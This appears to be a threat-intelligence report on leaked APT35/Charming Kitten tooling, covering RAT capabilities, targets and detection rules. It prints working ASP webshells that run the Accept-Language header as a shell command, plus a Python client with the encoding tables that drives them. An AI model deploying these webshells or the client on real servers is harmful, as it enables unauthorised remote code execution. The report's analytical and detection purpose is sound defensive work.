An Insider Look At The IRGC-linked APT35 Operations: Ep3 - Malware Arsenal & Tooling

Executive Summary

Episode 3 documents reveal APT35/Charming Kitten's complete malware development pipeline, including two distinct RAT families (Saqeb System and RAT-2AC2), custom webshells, training materials, and operational testing procedures. This collection represents a professional malware development operation with dedicated quality assurance, anti-detection research, and modular architecture designed for long-term persistence in Windows environments.

These documents expose the entire malware development lifecycle, from reverse engineering training materials to production deployment, including FUD testing procedures, module specifications, and operational webshell infrastructure.

‍

Analysis 

Key Findings Summary

1. Malware Arsenal:

• Saqeb System: Professional Windows RAT with 5 modules, FUD-focused, multi-hop C2 via TOR
• RAT-2AC2: .NET-based RAT with Flask backend, VNC capability, masquerading as legitimate services
• Webshells: Custom m0s.asp variants using Accept-Language header covert channel and substitution cipher
• Support Tools: Encryptor V1, phishing kits (Google Drive lures), training materials

2. Operational Scale:

• 300+ compromised entities (stated by APT35)
• 6+ countries targeted (UAE, Jordan, Turkey, Israel, Egypt, Saudi Arabia)
• Multiple confirmed breaches: FlyDubai, Dubai Police, Jordan Desert Tourism, Eposta, plus all Episode 1-2 victims
• Long-term operations: 2022-2025 documented activity

3. Sophistication Level:

• Advanced development: Native code (C/C++), modular architecture, professional QA/testing
• Anti-detection focus: FUD lab, systematic AV evasion, anti-debug/anti-VM, string obfuscation
• Operational security: Multi-hop C2, TOR integration, relay servers, traffic encryption
• Quality documentation: Complete manuals, training curricula, operational reports

4. Strategic Objectives:

• Regional intelligence: Airport/hotel databases, law enforcement, SCADA systems
• Anti-Israel operations: Moses' Staff ransomware group, 300+ sites prepped for attacks
• Influence campaigns: Black Flags, Zion 24, "Israel, The Fragile Mirror"
• Axis of Resistance support: CCTV sharing, intelligence coordination, regional alliance

‍

Malware Family Analysis

A. Saqeb System - Primary Windows RAT

Overview

• Name: Saqeb System (ساماه ثاقب)
• Organization: Ofogh Media Institute (موسسه رسانه ای افق)
• Classification: Advanced Windows RAT with modular architecture
• Target Platform: Windows (all versions)
• Development Language: C++ (Native code - non-.NET dependent)
• Architecture: Two-part system (Agent + Command Panel)

Agent Specifications:

• Programming Language: C++ (Native)
• Compilation: Visual Studio 2015
• Runtime: Multi-threaded (/MT flag)
• Dependencies: Framework-independent (native code)
• Anti-Detection: FUD-focused design
• Communication: HTTP/HTTPS with XOR encryption

Modular Structure (5 Components):

Command & Control Panel

Panel Technology Stack:

• Platform: Web-based (TOR hidden service)
• Backend: Not specified (likely PHP/Python)
• Access: Username/password + CAPTCHA
• Communication: HTTP over TOR
• Default Interval: 20 seconds (configurable)

‍

Panel Capabilities:

Panel UI Features (from manual):

- Add New Client: Creates unique password-protected ZIP agent

- Serial Number: Unique identifier per agent (e.g., 337E81E3BA4B)

- Status: Online/Offline/STOP states

- Interval Slider: Adjust callback frequency (seconds)

- History Logs: Command execution tracking with timestamps

- User Management: Multi-user access control

- Lock Screen: Panel security feature

- CSV Export: Command results extraction

‍

Execution Flow:

1. Download lock.dat from server (hex-encoded)

2. Decode to rns.dll

3. Create BAT file with rundll32 command

4. Execute BAT → rundll32 loads rns.dll

5. Call snrProc() function

6. Random byte destruction on accessible files

Session Hijacking Workflow:

1. Search disk for Telegram folder

2. Locate session files

3. Base64 encode all files

4. Transmit to C2

5. Attacker replaces files on new system

6. Gain Telegram access (if no Cloud Password)

‍

B. RAT-2AC2 - Secondary RAT Platform

Overview

• Development: C# language + .NET Framework 4
• Server: Python + Flask Version 2
• Protocol: HTTP/HTTPS
• Architecture: Client-Server with API-based registration
• Infrastructure: Supports DNS forwarding and multiple relays

Technical Specifications

Client (Agent):

• Language: C#
• Framework: .NET 4.0 (Managed code)
• Platform: Windows
• Communication: HTTP REST API
• Authentication: Header-based token
• Status Reporting: Every 5 seconds
• Initial Command: systeminfo execution

Server (Panel):

• Language: Python 3.x
• Framework: Flask 2.x
• OS Recommendation: Linux Debian
• Installation: pip3 install -r requirement.txt
• Execution: python3 app.py
• Configuration: Final line of app.py (address/port)

API Endpoints

Security Implementation

Authentication Flow:

1. Client sends API request with header token

2. Server validates token

3. If valid, assigns unique ID

4. Client uses ID for all subsequent requests

5. Commands retrieved via /cmd/<id>

Capabilities

Remote Access:

• VNC: Browser-based via noVNC + bore.pub tunneling
• Command Execution: Windows CMD shell
• Keylogging: Background keyboard capture with file storage
• Screenshot: Desktop image capture
• File Management: Upload/download with path specification

VNC Architecture:

1. Client downloads bore software

2. Sets up noVNC server

3. Executes port forward via bore

4. Sends bore.pub address + port to server

5. Operator connects via browser

6. Terminate via vncTerminate (kills all services)

File Operations:

Download from Client:

1. Command: DOWNLOAD=/path/to/file

2. Client reads file → Base64 encode → Send to server

3. Server stores file → Displays in panel

4. Access level dependent on client privileges

Upload to Client:

1. Upload file to server via /file

2. Register command: UPLOAD=/path/to/file/filename.ext

3. Client downloads from server

4. Client writes file to specified path

Keylogger Workflow:

1. Server sends "keylogger" command

2. Panel button turns red (waiting)

3. Client starts logging to disk file

4. Results sent periodically to server

5. Panel button turns blue (data received)

6. Click button to view results

Webshell Infrastructure

A. m0s.asp - Advanced ASP Webshell

Overview

• Language: Classic ASP (VBScript)
• Method: HTTP Header-based command channel
• Encoding: Custom substitution cipher
• Execution: WScript.Shell command execution

Technical Implementation

Command Channel:

asp

' Read Accept-Language header

cmdEncoded = Request.ServerVariables("HTTP_ACCEPT_LANGUAGE")

‍

' Decode via custom cipher

cmdDecoded = DecodeFunction(cmdEncoded)

‍

' Execute command

Set objShell = Server.CreateObject("WScript.Shell")

Set objExec = objShell.Exec("cmd /c " & cmdDecoded)

‍

' Return STDOUT

Response.Write objExec.StdOut.ReadAll()

Substitution Cipher:

Encoding Table (EN):

AB_CDEFG.HIJKLM!$%&*()?NOPQR-STUVWXYZabcdefghijklmnopqrstu=vwxyz0123456789/

Decoding Table (DE):

Qk3\afcPbYJTGywSv=0Egdx62X-NRVz!~$%_*()?Uq7os1ijFMuLOetCl98K5nBrn4.prWAHmIZ

Decode Function Logic:

• For each character in encoded string:
  
  •     Find position in DE table
  •     Replace with character at same position in EN table
  •     Append to decoded string
• Return decoded command

Operational Use

Client Scripts (Python):

python

# connect.py, RCE4.py, rce5.py pattern

‍

import requests

‍

# Hardcoded target URLs (examples from artifacts)

targets = [

    "https://<domain>/images/flash/test9/m0s.phto",

    "http://<IP>/images/m0s.php",

    "http://<domain>/CMS/Uploads/m0s.aspx"

]

‍

# Encoding function (mirrors ASP decoder)

def encode_command(cmd):

    en = "AB_CDEFG.HIJKLM!$%&*()?NOPQR-STUVWXYZabcdefghijklmnopqrstu=vwxyz0123456789/"

    de = "Qk3\\afcPbYJTGywSv=0Egdx62X-NRVz!~$%_*()?Uq7os1ijFMuLOetCl98K5nBrn4.prWAHmIZ"

    trans = str.maketrans(en, de)

    return cmd.translate(trans)

‍

# Interactive loop

while True:

    cmd = input("CMD> ")

    encoded = encode_command(cmd)

    headers = {

        "Accept-Language": encoded,

        "Accept-Captcha": "[predefined value]",

        "User-Agent": "Mozilla/5.0..."

    }

    response = requests.get(target_url, headers=headers)

    print(response.text)

B. file.asp / webshell.asp - Simpler Variants

Implementation

asp

<%

' Direct command execution (no encoding)

cmd = Request.ServerVariables("HTTP_ACCEPT_LANGUAGE")

‍

Set objShell = Server.CreateObject("WScript.Shell")

Set objExec = objShell.Exec("cmd /c " & cmd)

‍

Response.Write objExec.StdOut.ReadAll()

%>

Aim: Full RCE with IIS worker process privileges, no authentication, direct header-to-shell execution.

‍

3. Target Intelligence

A. Targeting Pattern Analysis

Geographic Focus:

• Primary: UAE (2 confirmed: FlyDubai, Dubai Police)
• Secondary: Jordan (1 confirmed: Tourism sector)
• Tertiary: Turkey (1 confirmed: Email provider)
• Active: Israel (folder structure confirms)

Active: Egypt (folder structure confirms)

Sector Targeting:

• Aviation: FlyDubai
• Law Enforcement: Dubai Police
• Tourism: Jordan Desert
• Communications: Eposta

Strategic Pattern:

• Critical Infrastructure: Aviation sector
• Intelligence Goldmine: Law enforcement systems
• Economic Intelligence: Tourism (visitor tracking)
• Communications Surveillance: Email providers

B. SCADA/Industrial Targeting (from #78TPDD report)

Stated Capabilities:

• "Establishing access to industrial infrastructures and extracting SCADA domain information for utilization in offensive cyber operations"

Implications:

• Active SCADA reconnaissance ongoing
• Information collection for future attacks
• Offensive capability development
• Critical infrastructure targeting

Potential Targets (based on regional focus):

• Oil & gas facilities (UAE, Saudi Arabia)
• Water treatment plants (mentioned: National Water Company access in Episode 2)
• Power generation/distribution
• Desalination plants (critical UAE infrastructure)
• Airport systems (FlyDubai access point)

C. Ransomware Scale (from #78TPDD report)

Stated Achievement:

• "Establishing access on over 300 sites and companies for 

ransomware attacks in line with media exploitation"

Analysis:

• 300+ compromised entities: Massive access inventory
• Ransomware ready: Pre-positioned for deployment
• Media weaponization: Attacks timed for psychological impact
• Moses' Staff group: Public attribution for operations

Moses' Staff Operations:

• Tactics: Ransomware + data leaks
• Target: "Zionist regime" (Israel)
• Media Strategy: Global news network coverage
• Purpose: "Breaking hollow dominance in cyber capability"

‍

4. Detection & Prevention Guidance

Behavioral Detection

Saqeb Behavioral Pattern:

‍

Triggers:

1. Process creates mutex via CreateEventA()

2. AND loads library from .dat file (LoadLibrary on non-PE extension)

3. AND makes HTTPS connections with XOR-encrypted payloads

4. AND exhibits one of:

   - Keyboard hooking (SetWindowsHookEx WH_KEYBOARD_LL)

   - File enumeration at disk root level

   - Multiple small network transmissions with delays

   - Firefox profile directory access (logins.json)

   - Telegram folder access (D877F783D5D3EF8Cs)

‍

Severity: CRITICAL

Response: Isolate, collect memory dump, alert SOC

RAT-2AC2 Behavioral Pattern:

Rule: APT35_RAT2AC2_Behavior

‍

Triggers:

1. .NET executable with service-like name runs from non-standard location

2. AND makes HTTP POST to /api endpoint with system enumeration data

3. AND polls /cmd/<id> endpoint every 5-10 seconds

4. AND exhibits one of:

   - Downloads bore.pub software

   - Starts noVNC service

   - Executes systeminfo command

   - Creates files in Base64 format

   - Port forwarding activity

‍

Severity: CRITICAL

Response: Kill process, block C2 IPs, forensic investigation

Webshell Behavioral Pattern:

Rule: APT35_Webshell_Behavior

‍

Triggers:

1. IIS worker process (w3wp.exe)

2. AND spawns cmd.exe or powershell.exe

3. AND command includes suspicious keywords:

   - whoami, net user, net localgroup

   - ipconfig, netstat, tasklist

   - dir C:\, type [file]

   - WMIC, NET USE (lateral movement)

4. AND HTTP request contained unusual Accept-Language header

‍

Severity: HIGH

Response: Block source IP, kill web process, check for persistent webshells

5. MITRE ATT&CK Mapping

References

• *Intelligence source and information reliability - Wikipedia
• ^#Traffic Light Protocol - Wikipedia
• https://www.cloudsek.com/blog/an-insider-look-at-the-irgc-linked-apt35-operations 

https://github.com/KittenBusters/CharmingKitten